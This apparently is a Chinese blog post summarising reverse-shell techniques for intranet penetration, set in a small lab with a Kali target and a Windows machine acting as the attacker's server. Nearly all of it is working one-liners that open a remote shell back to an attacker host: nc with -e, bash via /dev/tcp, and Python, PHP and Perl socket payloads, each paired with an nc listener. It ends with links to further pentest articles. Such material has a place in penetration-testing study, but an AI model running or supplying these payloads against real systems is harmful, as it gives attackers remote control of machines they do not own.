1、实验环境 Kali:192.168.32.132 //模拟靶机
Windows:192.168.32.1 //模拟公网vps
2、若靶机上存在nc,获取反向shell:
vps攻击机:nc -lvp 9999// 监听9999端口
靶机:nc 1.1.1.1 9999 -e /bin/bash // Linux正向连接公网vps1.1.1.1的9999端口
nc 1.1.1.1 9999 -e c:\windows\system32\cmd.exe// Windows
文章图片
文章图片
3、若靶机上不存在nc,可用如下几种方式进行代替: (1) Bash反弹shell
vps攻击机:nc -lvp 6666
靶机:bash -I >& /dev/tcp/192.168.32.1/6666 0>&1
文章图片
文章图片
(2)靶机存在Python环境,Python反弹shell
vps攻击机:nc -lvp 6666
靶机:python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.32.1",6666));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
'
文章图片
文章图片
(3)靶机存在PHP环境,PHP反向shell:
vps攻击机:nc -lvp 6666
靶机:php -r '$sock=fsockopen("192.168.32.1",6666);
exec("/bin/sh -i <&3 >&3 2>&3");
'
【内网渗透|内网渗透(nc反弹shell总结)】
文章图片
文章图片
(4)靶机存在Perl环境,Perl反弹shell:
Vps攻击机:nc -lvp 6666
靶机:perl -e 'use Socket;
$i="192.168.32.1";
$p=6666;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
};
'
文章图片
文章图片
推荐阅读
- 内网渗透|【内网渗透】openssl反弹流量加密shell
- 内网渗透|【内网渗透】内网不出网机器反弹shell以及CS上线
- 安全|渗透测试 流程
- 渗透测试|通用渗透测试框架、简化渗透测试流程
- matlab|信息完全技术之Enigma密码机【MATLAB程序及软件APP实现】
- FAQ丨构建业务安全平台架构,你想要的答案都在这里
- #|PE格式系列_0x02(PE头部信息(WinDbg查看))
- 安全|OpenHarmony安全子系统之应用签名与验签
- 数字政府建设提档,融云协同办公护航